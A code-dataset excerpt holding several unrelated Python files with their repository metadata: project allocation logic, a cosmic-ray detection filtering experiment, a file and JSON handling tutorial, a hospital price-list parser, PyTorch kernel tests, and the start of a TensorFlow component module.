len(freeprojects)) + " projects are available. All remaining students will be randomly allocated a project\n")
elif updates == True and len(freeprojects) < len(unassignedStudents):
diff = len(unassignedStudents) - len(freeprojects)
print(
str(len(freeprojects)) + " projects are available. " + str(diff) + " students will not be assigned to projects\n")
for student in unassignedStudentsCopy:
if len(freeprojects) > 0:
thisproject = random.choice(freeprojects)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
if updates:
print("Student "+student+" has been allocated to project "+thisproject+" with lecturer "+thislecturer)
studAssignments.update({student:thisproject})
freeprojects.pop(0)
for student in studAssignments:
if student in unassignedStudents:
unassignedStudents.remove(student)
return{"Student Assignments": studAssignments, "Lecturer Assignments":lectAssignments, "Project Assignments":projAssignments, "Unassigned Students": unassignedStudents}
def topic_distribute(unassignedStudents,studTopicPrefs,studAssignments,projAssignments,projCaps,lectAssignments,lecturercaps, projLects, lectProjs, updates):
freeprojects = []
    unassignedStudentsCopy = list(unassignedStudents)  # real copy: the original list is mutated later
freeprojects = library.findFreeProjects(projAssignments, projCaps, lectAssignments, lecturercaps, lectProjs)
    if updates == True:
        print("***Distributing remaining " + str(len(unassignedStudents)) + " students***\n")
    if updates == True and len(freeprojects) < len(unassignedStudents):
        diff = len(unassignedStudents) - len(freeprojects)
        print(
            str(len(
                freeprojects)) + " projects are available. " + str(diff) + " students will not be assigned to projects\n")
inorgfree = []
orgfree = []
medfree = []
physfree = []
for project in freeprojects:
if re.match("I[A-Z][0-9][0-9]", project) is not None:
inorgfree.append(project)
if re.match("O[A-Z][0-9][0-9]", project) is not None:
orgfree.append(project)
if re.match("P[A-Z][0-9][0-9]", project) is not None:
physfree.append(project)
if re.match("M[A-Z][0-9][0-9]", project) is not None:
medfree.append(project)
for student in unassignedStudentsCopy:
print("Assigning student "+student)
if len(freeprojects) > 0:
print("There are "+str(len(freeprojects))+" projects remaining")
for topic in studTopicPrefs[student]:
print("Currently looking for an "+topic+" project")
if topic == "I" and len(inorgfree) > 0:
print("Found I")
thisproject = random.choice(inorgfree)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
studAssignments.update({student: thisproject})
freeprojects.remove(thisproject)
inorgfree.remove(thisproject)
#unassignedStudents.remove(student)
if updates:
print("Allocated "+student+" to project "+thisproject+" with lecturer "+ thislecturer+"\n")
break
if topic == "O" and len(orgfree) > 0:
print("Found O")
thisproject = random.choice(orgfree)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
studAssignments.update({student: thisproject})
freeprojects.remove(thisproject)
orgfree.remove(thisproject)
#unassignedStudents.remove(student)
if updates:
print(
"Allocated " + student + " to project " + thisproject + " with lecturer " + thislecturer + "\n")
break
if topic == "P" and len(physfree) > 0:
print("Found P")
thisproject = random.choice(physfree)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
studAssignments.update({student: thisproject})
freeprojects.remove(thisproject)
physfree.remove(thisproject)
#unassignedStudents.remove(student)
if updates:
print(
"Allocated " + student + " to project " + thisproject + " with lecturer " + thislecturer + "\n")
break
if topic == "M" and len(medfree) > 0:
print("Found M")
thisproject = random.choice(medfree)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
studAssignments.update({student: thisproject})
freeprojects.remove(thisproject)
medfree.remove(thisproject)
#unassignedStudents.remove(student)
if updates:
print(
"Allocated " + student + " to project " + thisproject + " with lecturer " + thislecturer + "\n")
break
for student in studAssignments:
if student in unassignedStudents:
unassignedStudents.remove(student)
#random.shuffle(unassignedStudentsCopy)
return{"Student Assignments": studAssignments, "Lecturer Assignments":lectAssignments, "Project Assignments":projAssignments, "Unassigned Students": unassignedStudents}
| 38.53406
| 172
| 0.680031
| 1,398
| 14,142
| 6.877682
| 0.101574
| 0.029745
| 0.028081
| 0.040562
| 0.679563
| 0.627977
| 0.610192
| 0.602496
| 0.598336
| 0.590016
| 0
| 0.005402
| 0.214609
| 14,142
| 367
| 173
| 38.53406
| 0.860268
| 0.04172
| 0
| 0.646875
| 0
| 0
| 0.09171
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009375
| false
| 0.00625
| 0.009375
| 0
| 0.021875
| 0.075
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1f2709a9b0d54f4549f4f5b2c964cce095a32f9
| 3,655
|
py
|
Python
|
example/experiments/01_experiment.py
|
dzwiedziu-nkg/credo-classify-framework
|
45417b505b4f4b20a7248f3487ca57a3fd49ccee
|
[
"MIT"
] | null | null | null |
example/experiments/01_experiment.py
|
dzwiedziu-nkg/credo-classify-framework
|
45417b505b4f4b20a7248f3487ca57a3fd49ccee
|
[
"MIT"
] | null | null | null |
example/experiments/01_experiment.py
|
dzwiedziu-nkg/credo-classify-framework
|
45417b505b4f4b20a7248f3487ca57a3fd49ccee
|
[
"MIT"
] | 3
|
2020-06-19T15:41:19.000Z
|
2020-06-29T12:47:05.000Z
|
import bz2
import time
import urllib.request
import io
from typing import List, Tuple
from credo_cf import load_json_from_stream, progress_and_process_image, group_by_device_id, group_by_resolution, too_often, near_hot_pixel2, \
too_bright
from credo_cf import xor_preprocess
from credo_cf.commons.utils import get_and_add
WORKING_SET = 'http://mars.iti.pk.edu.pl/~nkg/credo/working_set.json.bz2'
time_profile = {}
def download_working_set(url: str) -> Tuple[List[dict], int]:
print('Download working set...')
data = urllib.request.urlopen(url).read()
print('Decompress...')
json_content = bz2.decompress(data).decode("utf-8")
    print('Parse JSON...')
objs, count, errors = load_json_from_stream(io.StringIO(json_content), progress_and_process_image)
print('Parsed %d, skipped %d' % (count, count - len(objs)))
return objs, count
def start_analyze(all_detections):
# print('Make custom grayscale conversion...')
# for d in all_detections:
# convert_to_gray(d)
ts_load = time.time()
print('Group by devices...')
by_devices = group_by_device_id(all_detections)
get_and_add(time_profile, 'grouping', time.time() - ts_load)
drop_counts = {}
leave_good = 0
print('Run experiment...')
dev_no = 0
dev_count = len(by_devices.keys())
for device_id, device_detections in by_devices.items():
ts_load = time.time()
by_resolution = group_by_resolution(device_detections)
get_and_add(time_profile, 'grouping', time.time() - ts_load)
for resolution, detections in by_resolution.items():
dev_no += 1
            print('Start device %d of %d, detections count: %d' % (dev_no, dev_count, len(detections)))
# too_often
ts_load = time.time()
goods = detections
bads, goods = too_often(goods)
get_and_add(drop_counts, 'too_often', len(bads))
get_and_add(time_profile, 'too_often', time.time() - ts_load)
# too_bright
ts_load = time.time()
bads, goods = too_bright(goods, 70, 70)
get_and_add(time_profile, 'too_bright', time.time() - ts_load)
get_and_add(drop_counts, 'too_bright', len(bads))
# xor filter
ts_load = time.time()
            if len(goods) > 1:
                x_or = xor_preprocess(goods)  # note: result is currently unused downstream
get_and_add(time_profile, 'xor', time.time() - ts_load)
# near_hot_pixel2
ts_load = time.time()
bads, goods = near_hot_pixel2(goods)
get_and_add(time_profile, 'near_hot_pixel2', time.time() - ts_load)
get_and_add(drop_counts, 'drop_near_hot_pixel2', len(bads))
# end, counting goods
leave_good += len(goods)
print('\nCount of cut off by filters:')
for f, v in drop_counts.items():
print('%s: %d' % (f, v))
print('Goods: %d' % leave_good)
def main():
# config data source, please uncomment and use one from both
ts_load = time.time()
# choice 1: download from website
working_sets = [download_working_set(WORKING_SET)] # download our working set from our hosting
# choice 2: load from files
# file_names = ['working_set.json']
# working_sets = [load_json(fn, progress_and_process_image) for fn in file_names]
get_and_add(time_profile, 'load', time.time() - ts_load)
for all_detections, count in working_sets:
start_analyze(all_detections)
print('\nTime count:')
for ts, tv in time_profile.items():
print('time: %03d - %s' % (int(tv), ts))
if __name__ == '__main__':
main()
| 31.782609
| 142
| 0.642681
| 507
| 3,655
| 4.335306
| 0.274162
| 0.038217
| 0.045041
| 0.044586
| 0.198817
| 0.153321
| 0.077343
| 0.077343
| 0.077343
| 0.047316
| 0
| 0.007565
| 0.240492
| 3,655
| 114
| 143
| 32.061404
| 0.784222
| 0.118468
| 0
| 0.128571
| 0
| 0.014286
| 0.120674
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042857
| false
| 0
| 0.114286
| 0
| 0.171429
| 0.171429
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1f2f70605379c3a09598bf2b8739bb4f47caa1b
| 3,944
|
py
|
Python
|
30-Days-Of-Python/30-Days-Of-Python/19_file_handling.py
|
zhaobingwang/python-samples
|
d59f84d2b967cc793cb9b8999f8cdef349fd6fd5
|
[
"MIT"
] | null | null | null |
30-Days-Of-Python/30-Days-Of-Python/19_file_handling.py
|
zhaobingwang/python-samples
|
d59f84d2b967cc793cb9b8999f8cdef349fd6fd5
|
[
"MIT"
] | null | null | null |
30-Days-Of-Python/30-Days-Of-Python/19_file_handling.py
|
zhaobingwang/python-samples
|
d59f84d2b967cc793cb9b8999f8cdef349fd6fd5
|
[
"MIT"
] | null | null | null |
print('---------- Opening Files for Reading ----------')
f = open('./files/reading_file_example.txt')
print(f) # <_io.TextIOWrapper name='./files/reading_file_example.txt' mode='r' encoding='cp936'>
print('\t---------- read() ----------')
# read(): read the whole text as string. If we want to limit the number of characters we read,
# we can limit it by passing int value to the methods.
f = open('./files/reading_file_example.txt')
txt = f.read()
print(type(txt)) # <class 'str'>
print(txt) # Hello,Python!
f.close()
f = open('./files/reading_file_example.txt')
txt = f.read(5)
print(type(txt)) # <class 'str'>
print(txt) # Hello
f.close()
print('\t---------- readline(): read only the first line ----------')
f = open('./files/reading_file_example.txt')
line = f.readline()
print(type(line)) # <class 'str'>
print(line) # Hello,Python!
f.close()
print('\t---------- readlines(): read all the text line by line and returns a list of lines ----------')
f = open('./files/reading_file_example.txt')
lines = f.readlines()
print(type(lines)) # <class 'list'>
print(lines) # ['Hello,Python!']
f.close()
print('\t---------- splitlines() ----------')
f = open('./files/reading_file_example.txt')
lines = f.read().splitlines()
print(type(lines)) # <class 'list'>
print(lines) # ['Hello,Python!']
f.close()
print('\t---------- Another way to close a file ----------')
with open('./files/reading_file_example.txt') as f:
lines = f.read().splitlines()
print(type(lines)) # <class 'list'>
print(lines) # ['Hello,Python!']
print('---------- Opening Files for Writing and Updating ----------')
# To write to an existing file, we must add a mode as parameter to the open() function:
# "a" - append - will append to the end of the file, if the file does not exist it raise FileNotFoundError.
# "w" - write - will overwrite any existing content, if the file does not exist it creates.
with open('./files/writing_file_example.txt', 'a') as f:
f.write('Hello,Python!')
with open('./files/writing_file_example.txt', 'w') as f:
f.write('Hello,Java!')
print('---------- Deleting Files ----------')
import os
if os.path.exists('./files/writing_file_example.txt'):
os.remove('./files/writing_file_example.txt')
else:
    print('The file does not exist!')
print('---------- File Types ----------')
print('\t---------- File with json Extension ----------')
# dictionary
person_dct = {
"name": "Zhang San",
"country": "China",
"city": "Hangzhou",
"skills": ["Java", "C#", "Python"]
}
# JSON: a string form of a dictionary
person_json = "{'name': 'Zhang San', 'country': 'China', 'city': 'Hangzhou', 'skills': ['Java', 'C#', 'Python']}"
# we use three quotes and make it multiple line to make it more readable
person_json = '''{
"name":"Zhang San",
"country":"China",
"city":"Hangzhou",
"skills":["Java", "C#","Python"]
}'''
print('\t---------- Changing JSON to Dictionary ----------')
import json
person_json = '''{
"name":"Zhang San",
"country":"China",
"city":"Hangzhou",
"skills":["Java", "C#","Python"]
}'''
person_dct = json.loads(person_json)
print(person_dct)
print(person_dct['name'])
print('\t---------- Changing Dictionary to JSON ----------')
person_dct = {
"name": "Zhang San",
"country": "China",
"city": "Hangzhou",
"skills": ["Java", "C#", "Python"]
}
person_json = json.dumps(person_dct, indent=4) # indent could be 2, 4, 8. It beautifies the json
print(type(person_json)) # <class 'str'>
print(person_json)
print('\t---------- Saving as JSON File ----------')
person_dct = {
"name": "Zhang San",
"country": "China",
"city": "Hangzhou",
"skills": ["Java", "C#", "Python"]
}
with open('./files/json_example.json', 'w', encoding='utf-8') as f:
json.dump(person_dct, f, ensure_ascii=False, indent=4)
print('\t---------- File with csv Extension ----------')
import csv
# with open('./files/csv_example.csv') as f:
| 31.806452
| 113
| 0.606491
| 542
| 3,944
| 4.333948
| 0.239852
| 0.056194
| 0.07152
| 0.078331
| 0.489144
| 0.43593
| 0.413367
| 0.338442
| 0.310345
| 0.281396
| 0
| 0.002979
| 0.148834
| 3,944
| 123
| 114
| 32.065041
| 0.696753
| 0.230223
| 0
| 0.526316
| 0
| 0.010526
| 0.533378
| 0.125208
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.031579
| 0
| 0.031579
| 0.326316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1f6211abde32ba71ccaac35e7c39eb9935dfa7c
| 2,491
|
py
|
Python
|
data/grady-memorial-hospital/parse.py
|
Afellman/hospital-chargemaster
|
1b87bc64d95d97c0538be7633f9e469e5db624e2
|
[
"MIT"
] | 34
|
2019-01-18T00:15:58.000Z
|
2022-03-26T15:01:08.000Z
|
data/grady-memorial-hospital/parse.py
|
wsheffel/hospital-chargemaster
|
b3473c798fd2f343f7f02c1e32496f9eea9fa94d
|
[
"MIT"
] | 8
|
2019-01-16T22:06:11.000Z
|
2019-02-25T00:59:25.000Z
|
data/grady-memorial-hospital/parse.py
|
wsheffel/hospital-chargemaster
|
b3473c798fd2f343f7f02c1e32496f9eea9fa94d
|
[
"MIT"
] | 10
|
2019-02-20T14:58:16.000Z
|
2021-11-22T21:57:04.000Z
|
#!/usr/bin/env python
import os
from glob import glob
import json
import pandas
import datetime
import sys
here = os.path.dirname(os.path.abspath(__file__))
folder = os.path.basename(here)
latest = '%s/latest' % here
year = datetime.datetime.today().year
output_data = os.path.join(here, 'data-latest.tsv')
output_year = os.path.join(here, 'data-%s.tsv' % year)
from zipfile import ZipFile
# Function to read a zip into memory
def extract_zip(input_file):
input_zip = ZipFile(input_file)
return {name: input_zip.read(name) for name in input_zip.namelist()}
# Don't continue if we don't have latest folder
if not os.path.exists(latest):
print('%s does not have parsed data.' % folder)
sys.exit(0)
# Don't continue if we don't have results.json
results_json = os.path.join(latest, 'records.json')
if not os.path.exists(results_json):
print('%s does not have results.json' % folder)
sys.exit(1)
with open(results_json, 'r') as filey:
results = json.loads(filey.read())
columns = ['charge_code',
'price',
'description',
'hospital_id',
'filename',
'charge_type']
df = pandas.DataFrame(columns=columns)
for result in results:
filename = os.path.join(latest, result['filename'])
if not os.path.exists(filename):
print('%s is not found in latest folder.' % filename)
continue
if os.stat(filename).st_size == 0:
print('%s is empty, skipping.' % filename)
continue
contents = None
if filename.endswith('txt'):
# ['DESCRIPTION', 'Unnamed: 1', 'PRICE']
contents = pandas.read_csv(filename)
contents = contents.dropna(how='all')
print("Parsing %s" % filename)
print(contents.head())
# Update by row
for row in contents.iterrows():
idx = df.shape[0] + 1
price = row[1]['PRICE'].replace('$','').replace(',','').strip()
entry = [None, # charge code
price, # price
row[1]["DESCRIPTION"], # description
result['hospital_id'], # hospital_id
                 result['filename'], # filename
                 'standard'] # charge_type
df.loc[idx,:] = entry
# Remove empty rows
df = df.dropna(how='all')
# Save data!
print(df.shape)
df.to_csv(output_data, sep='\t', index=False)
df.to_csv(output_year, sep='\t', index=False)
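# Consumption sketch (added): the outputs are plain TSVs and can be
# reloaded with pandas for downstream checks.
print(pandas.read_csv(output_data, sep='\t').head())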
| 29.654762
| 75
| 0.583701
| 318
| 2,491
| 4.490566
| 0.349057
| 0.042017
| 0.028011
| 0.023109
| 0.118347
| 0.033613
| 0.033613
| 0.033613
| 0
| 0
| 0
| 0.004464
| 0.28061
| 2,491
| 83
| 76
| 30.012048
| 0.792411
| 0.109996
| 0
| 0.033898
| 0
| 0
| 0.133394
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016949
| false
| 0
| 0.101695
| 0
| 0.135593
| 0.118644
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1f62ac7868b351e283f53daaf44f5e2562dfc27
| 10,476
|
py
|
Python
|
DeterministicParticleFlowControl/tests/test_pytorch_kernel.py
|
dimitra-maoutsa/DeterministicParticleFlowControl
|
106bc9b01d7a4888e4ded18c5fb5a989fe672386
|
[
"MIT"
] | 6
|
2021-12-13T14:30:31.000Z
|
2022-01-24T07:54:57.000Z
|
DeterministicParticleFlowControl/tests/test_pytorch_kernel.py
|
dimitra-maoutsa/DeterministicParticleFlowControl
|
106bc9b01d7a4888e4ded18c5fb5a989fe672386
|
[
"MIT"
] | 10
|
2021-12-18T23:04:53.000Z
|
2022-02-05T02:06:34.000Z
|
DeterministicParticleFlowControl/tests/test_pytorch_kernel.py
|
dimitra-maoutsa/DeterministicParticleFlowControl
|
106bc9b01d7a4888e4ded18c5fb5a989fe672386
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 10 07:20:39 2022
@author: maout
"""
import numpy as np
from scipy.spatial.distance import cdist
import torch
#from score_function_estimators import my_cdist
from typing import Union
from torch.autograd import grad
#%% select available device
def set_device():
device = "cuda" if torch.cuda.is_available() else "cpu"
if device != "cuda":
print("GPU is not enabled in this notebook. \n"
"If you want to enable it, in the menu under `Runtime` -> \n"
"`Hardware accelerator.` and select `GPU` from the dropdown menu")
else:
print("GPU is enabled in this notebook. \n"
"If you want to disable it, in the menu under `Runtime` -> \n"
"`Hardware accelerator.` and select `None` from the dropdown menu")
return device
#%%
class RBF(object):
"""
Class for implementing a Gaussian RBF kernel in pytorch.
Attributes
----------
length_scale : float or list or numpy.array
        Length scale of the kernel. Either a single float for one
        lengthscale across all dimensions or a vector of floats for different
        lengthscales across each dimension. Default is 1.0.
signal_variance : float, optional
        This is not used yet. The default is 1.0.
device : Union[bool,str], optional
        Selected device where the computations will be executed, i.e. cpu or gpu.
The default is None, which executes calculations on the cpu.
multil : Union[bool, None], optional
Boolean indicator determining whether lengthscale is a vector or a
single value. The default is False.
K_data : numpy.ndarray
Storage for the evaluation of the kernel on the datapoints (X, Y)
in order to be reused in the calculations of the gradient of the Kernel.
Methods
-------
Kernel(X, Y):
        Computes the kernel for the inputs X and Y. Stores and returns
        the result in K_data. Input arrays are of dimensionality (N, D) and
        (M, D) respectively. The resulting kernel has dimension (N, M).
gradient_X(X, Y):
        Computes the gradient of the kernel with respect to the first argument
along all D dimensions.
"""
def __init__(self, length_scale: Union[float, torch.tensor, np.ndarray]=1.0, signal_variance: float=1.0, device: Union[bool,str]=None, multil: Union[bool, None]=False) -> None:
"""
Initialising function for RBF Gaussian kernels using pytorch.
        Creates an object with the necessary parameters.
Parameters
----------
length_scale : Union[float, torch.tensor, np.ndarray], optional
            Lengthscale estimated from data. Can be either a single float,
            or a vector of floats for different lengthscales for each dimension.
The default is 1.0.
signal_variance : float, optional
            This is not used yet. The default is 1.0.
device : Union[bool,str], optional
            Selected device where the computations will be executed, i.e. cpu or gpu.
The default is None, which executes calculations on the cpu.
multil : Union[bool, None], optional
Boolean indicator determining whether lengthscale is a vector or a
single value. The default is False.
TO DO: Remove this option and just check whether length_scale input
is a vector or a single float.
Returns
-------
Instance of the object.
"""
# initialize parameters
if device is None:
self.device = torch.device("cpu")
else:
self.device = device
self.length_scale = torch.tensor(length_scale, dtype=torch.float32, device=self.device,
requires_grad=True)
self.signal_variance = torch.tensor(signal_variance, dtype=torch.float32, device=self.device,
requires_grad=True)
self.multil = torch.tensor(multil, dtype=torch.bool, device=self.device, requires_grad=False)
if self.multil:
            ## expand dimensions of the lengthscale vector to enable broadcasting
self.length_scale = self.length_scale[None, None, :]
self.K_data = torch.tensor(0, dtype=torch.float32, device=self.device, requires_grad=False)
def Kernel(self, X: np.ndarray, Y: Union[bool, np.ndarray]=None) -> np.ndarray:
if not torch.is_tensor(X):
# convert inputs to pytorch tensors if not already pytorched
X = torch.tensor(X, dtype=torch.float32, device=self.device)
N, D = X.shape
if Y is None:
Y = X
elif not torch.is_tensor(Y):
Y = torch.tensor(Y, dtype=torch.float32, device=self.device)
M, _ = Y.shape
# Re-indexing
X_i = X[:, None, :] # shape (N, D) -> (N, 1, D)
Y_j = Y[None, :, :] # shape (M, D) -> (1, M, D)
if not self.multil: ##if a single lengthscale is provided
# |X_i - Y_j|^2 # (N, M, D)
sqd = torch.sum( (X_i - Y_j)**2, 2)
# Divide by length scale
sqd = torch.div(sqd, self.length_scale.to(self.device)**2)
K = torch.exp( -0.5* sqd )
else:
sqd1 = torch.div( (X_i - Y_j)**2, self.length_scale.to(self.device)**2)
sqd = torch.sum( sqd1, 2)
K = torch.exp( -0.5* sqd )
K = torch.mul(self.signal_variance, K) # Signal Variance
self.K_data = K
        return K
def gradient_X(self, X: np.ndarray, Y: Union[bool, np.ndarray]=None) -> np.ndarray:
        N, D = X.shape
        if Y is None:
            Y = X
        M, _ = Y.shape
        diffs = X[:, None] - Y
redifs = torch.div(diffs, self.length_scale.to(self.device)**2)
redifs = torch.einsum( 'ijk,ij->ijk', redifs, self.K_data)
return redifs
def gradient_X2(self, X):
return None
    def gradient_XX(self, X: np.ndarray, Y: Union[bool, np.ndarray]=None) -> np.ndarray:
        # Convert inputs to tensors that require grad
        X = torch.tensor(X, dtype=torch.float32, device=self.device, requires_grad=True)
        if Y is None:
            Y = X
        else:
            Y = torch.tensor(Y, dtype=torch.float32, device=self.device, requires_grad=True)
        # compute the gradient of the (summed) kernel w.r.t. the two inputs
        inputs = (X,) if Y is X else (X, Y)
        J = grad(self.Kernel(X, Y).sum(), inputs)
        return J
def gradient_XX2(self, X, Y=None):
return None
#%% numpy versions of kernels functions
def Knp(x,y,l,multil=False):
if multil:
res = np.ones((x.shape[0],y.shape[0]))
for ii in range(len(l)):
tempi = np.zeros((x[:,ii].size, y[:,ii].size ))
##puts into tempi the cdist result
tempi = cdist(x[:,ii].reshape(-1,1), y[:,ii].reshape(-1,1),metric='sqeuclidean')
res = np.multiply(res,np.exp(-tempi/(2*l[ii]*l[ii])))
return res
else:
tempi = np.zeros((x.shape[0], y.shape[0] ))
tempi = cdist(x, y,'sqeuclidean') #this sets into the array tempi the cdist result
return np.exp(-0.5*tempi/(l*l))
def grdx_K_all(x,y,l,multil=False): # gradient of the kernel with respect to the 1st argument, along every dimension
N,dim = x.shape
M,_ = y.shape
diffs = x[:,None]-y
redifs = np.zeros((1*N,M,dim))
for ii in range(dim):
if multil:
redifs[:,:,ii] = np.multiply(diffs[:,:,ii],Knp(x,y,l,True))/(l[ii]*l[ii])
else:
redifs[:,:,ii] = np.multiply(diffs[:,:,ii],Knp(x,y,l))/(l*l)
return redifs
#%%
DEVICE = set_device()
dtype = torch.float
dim = 2
N = 3
M = 4
X = torch.randn(N, dim, device=DEVICE)
Z = torch.randn(M, dim, device=DEVICE)
# common device agnostic way of writing code that can run on cpu OR gpu
# that we provide for you in each of the tutorials
#%% test kernel evaluation with single lengthscale
lengthsc = 2
# pytorched
K_instance = RBF(length_scale=lengthsc, multil=False, device=DEVICE) ##instance of kernel object - non-evaluated
if DEVICE=='cpu':
Ktorch = K_instance.Kernel(X, Z).detach().numpy()
gradK_torch = K_instance.gradient_X(X, Z).detach().numpy()
else:
Ktorch = K_instance.Kernel(X, Z).cpu().detach().numpy()
gradK_torch = K_instance.gradient_X(X, Z).cpu().detach().numpy()
# numpyed
if DEVICE=='cpu':
K_numpy = Knp(X.detach().numpy(), Z.detach().numpy(),l=lengthsc, multil=False).astype(np.float32)
grad_K_numpy = grdx_K_all(X.detach().numpy(), Z.detach().numpy(), l=lengthsc, multil=False).astype(np.float32)
else:
K_numpy = Knp(X.cpu().detach().numpy(), Z.cpu().detach().numpy(),l=lengthsc, multil=False).astype(np.float32)
grad_K_numpy = grdx_K_all(X.cpu().detach().numpy(), Z.cpu().detach().numpy(), l=lengthsc, multil=False).astype(np.float32)
np.testing.assert_allclose(Ktorch, K_numpy, rtol=1e-06)
np.testing.assert_allclose(gradK_torch, grad_K_numpy, rtol=1e-06)
#%% test kernel evaluation with multiple lengthscales
lengthsc = np.array([1,2])
# pytorched
if DEVICE=='cpu':
K_instance2 = RBF(length_scale=lengthsc, multil=True, device=DEVICE) ##instance of kernel object - non-evaluated
Ktorch = K_instance2.Kernel(X, Z).detach().numpy()
gradK_torch = K_instance2.gradient_X(X, Z).detach().numpy()
else:
K_instance2 = RBF(length_scale=lengthsc, multil=True, device=DEVICE) ##instance of kernel object - non-evaluated
Ktorch = K_instance2.Kernel(X, Z).cpu().detach().numpy()
gradK_torch = K_instance2.gradient_X(X, Z).cpu().detach().numpy()
# numpyed
if DEVICE=='cpu':
K_numpy = Knp(X.detach().numpy(), Z.detach().numpy(),l=lengthsc, multil=True).astype(np.float32)
grad_K_numpy = grdx_K_all(X.detach().numpy(), Z.detach().numpy(), l=lengthsc, multil=True).astype(np.float32)
else:
K_numpy = Knp(X.cpu().detach().numpy(), Z.cpu().detach().numpy(),l=lengthsc, multil=True).astype(np.float32)
grad_K_numpy = grdx_K_all(X.cpu().detach().numpy(), Z.cpu().detach().numpy(), l=lengthsc, multil=True).astype(np.float32)
np.testing.assert_allclose(Ktorch, K_numpy, rtol=1e-06)
np.testing.assert_allclose(gradK_torch, grad_K_numpy, rtol=1e-06)
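#%% added sanity check (not in the original tests): an RBF kernel of a set
# of points with itself has a unit diagonal, since exp(-0.5 * 0) * 1 = 1
K_self = K_instance.Kernel(X, X)
np.testing.assert_allclose(
    torch.diagonal(K_self).cpu().detach().numpy(), np.ones(N), rtol=1e-06)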
| 37.683453
| 180
| 0.612447
| 1,491
| 10,476
| 4.22334
| 0.18444
| 0.041925
| 0.026679
| 0.019057
| 0.510719
| 0.494521
| 0.464507
| 0.441798
| 0.413054
| 0.397808
| 0
| 0.014371
| 0.262696
| 10,476
| 278
| 181
| 37.683453
| 0.80088
| 0.317106
| 0
| 0.283582
| 0
| 0
| 0.055916
| 0
| 0
| 0
| 0
| 0
| 0.029851
| 1
| 0.067164
| false
| 0
| 0.037313
| 0.014925
| 0.179104
| 0.014925
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1f6905a9916f479816181eeb443cb6b650cc61b
| 11,075
|
py
|
Python
|
components.py
|
zachgk/tfcomponents
|
6c33349ab13549debfc9b347df795c82e38cfa73
|
[
"MIT"
] | null | null | null |
components.py
|
zachgk/tfcomponents
|
6c33349ab13549debfc9b347df795c82e38cfa73
|
[
"MIT"
] | null | null | null |
components.py
|
zachgk/tfcomponents
|
6c33349ab13549debfc9b347df795c82e38cfa73
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import tensorflow as tf
import tflearn
from tflearn import variables as vs
from tflearn import activations
from tflearn import initializations
from tflearn import losses
from tflearn import utils
def condition(cond, t, f):
if cond is True:
return t
elif cond is False:
return f
else:
return tf.cond(cond, lambda: t, lambda: f)
class objectview(object):
def __init__(self, d):
self.__dict__.update(d)
componentInherit = {
'globalDroppath': False,
'localDroppath': False,
'localDroppathProb': .5,
'parentType': '',
'currentType': ''
}
class TFComponent:
def __getitem__(self, incoming):
global componentInherit
inheritBak = componentInherit.copy()
if 'localDroppath' in self.opts:
componentInherit['localDroppath'] = self.opts['localDroppath']
if 'globalDroppath' in self.opts:
componentInherit['globalDroppath'] = self.opts['globalDroppath']
componentInherit['parentType'] = componentInherit['currentType']
componentInherit['currentType'] = type(self).__name__
opts = objectview(self.opts)
